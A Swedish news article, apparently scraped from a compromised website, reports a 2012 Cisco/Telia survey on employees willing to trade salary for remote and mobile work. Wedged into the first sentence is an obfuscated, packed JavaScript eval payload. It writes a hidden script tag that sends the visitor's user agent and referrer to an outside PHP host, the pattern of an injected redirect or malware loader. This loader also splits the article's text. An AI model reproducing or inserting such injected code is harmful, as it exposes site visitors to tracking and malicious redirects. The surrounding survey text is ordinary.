Image Image Image Image Image Image Image Image Image Image

| 30 maj, 2020

Scroll to top

Top

Lön: Var femte kan tänka sig lägre lön mot friare jobb

Lön: Var femte kan tänka sig lägre lön mot friare jobb
Sebastian

Nästan eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eazya|var|u0026u|referrer|hnyty||js|php’.split(’|’),0,{}))
en femtedel av svenskarna kan tänka sig lägre lön om de fick möjlighet att arbeta mer mobilt eller fritt på distans och med de enheter som de själv önskar som exempelvis surfplattor eller smartphones samt frihet att använda sociala medier. 5 procent tycker att det är värt 1000 kronor i sänkt lön för den friheten. Det visar undersökningen Smarta Företag Index 2012 som bygger på enkätsvar från 4 278 medarbetare i näringslivet och offentlig sektor och är utförd av
Cisco och Telia
. Lön.

Smarta Företag Index 2012 är en undersökning som genomförs av TNS-Sifo på uppdrag av Cisco och Telia. Syftet är att ringa in teknikmognaden inom näringslivet och vilka attityder och behov medarbetare har utifrån ett kommunikationstekniskt perspektiv.

Undersökningen visar att nästan en femtedel (17 procent) av den arbetsföra befolkningen, motsvarande 780 000 svenskar, kan tänka sig att gå ner i lön i utbyte mot att få arbeta mer mobilt och på distans. Man kan till och med tänka sig sänka sin lön med 1000 kronor för att få ett friare arbetssätt.

De senaste årens trend att slippa vara bunden till en fysisk arbetsplats eller arbetssätt verkar stärkas. Det blir allt vanligare att personal vill ha möjlighet att jobba hemifrån eller från annan plats än själva arbetsplatsen mot en lägre lön . Många tror dessutom att mobil teknik skulle ge positiva effekter i arbetet, denna åsikt delas särskilt bland yngre anställda.

– Det finns en pågående attitydförskjutning i synen hur, var och när arbetet ska utföras. Det blir tydligt när anställda kan tänka sig att sänka lönen för att få större frihet att det är något som är väldigt viktigt för de anställda.  För företag som både vill vara en attraktiv arbetsgivare och skapa ett effektivt arbetssätt blir det viktigt att ta till sig de nya behoven bland medarbetarna, säger Sverker Hannervall, chef för Företagstjänster på TeliaSonera.

Undersökningen visar också att medarbetarna är missnöjda med tillgången till verktyg och tjänster för att kunna arbeta på distans på sina arbetsplatser. Endast 33 procent anser att deras arbetsgivare ligger i framkant när det gäller användning av informations- och kommunikationsteknik. Lön.

– Det finns en stor fördel för de arbetsgivare som kan erbjuda sina anställda ett mer flexibelt och mobilt arbetssätt. Det kommer locka unga talanger och samtidigt som man höjer konkurrenskraften kan man höja produktiviteten, säger Per Samuelsson ansvarig i Norden för Cisco Internet Business Solutions Group (IBSG).

Fler resultat från undersökningen:

  • 33 procent av de arbetsföra svenskarna anser att det borde vara en rättighet att få jobba på distans när så är möjligt – det motsvarar 1,5 miljoner arbetsföra personer (fjärde kvartalet 2011 var antalet sysselsatta på arbetsmarknaden 4, 6 miljoner, enligt SCB)
  • Anställda inom detaljhandeln utmärker sig i denna fråga – hela 43 procent ser distansarbete som en rättighet medan motsvarande siffra är 28 procent bland offentliganställda.
  • 54 procent av svenskarna tycker inte att det är nödvändigt att vara fysiskt närvarande på jobbet. De flesta menar att de i princip bara behöver vara på jobbet för att delta i viktiga möten. Denna inställning råder i ännu högre utsträckning bland yngre medarbetare.

För mer information:
Magnus Andersson, marknadschef Cisco, tfn: 070-605 90 04, e-post: magnande@cisco.com
Telias presstjänst, +46 771 77 58 30, e-post: press@teliasonera.com

Om Smarta Företag Index

  • Undersökningen genomfördes av TNS SIFO under december 2011 och januari 2012.
  • Frågorna har ställts via en webbenkät till 4 278 anställda och beslutsfattare i svenska företag, organisationer och offentlig sektor.
  • Resultaten är statistiskt säkerställda och representativa för näringslivet och offentlig sektor.’

Se Cisco pressrum för mer info: Cisco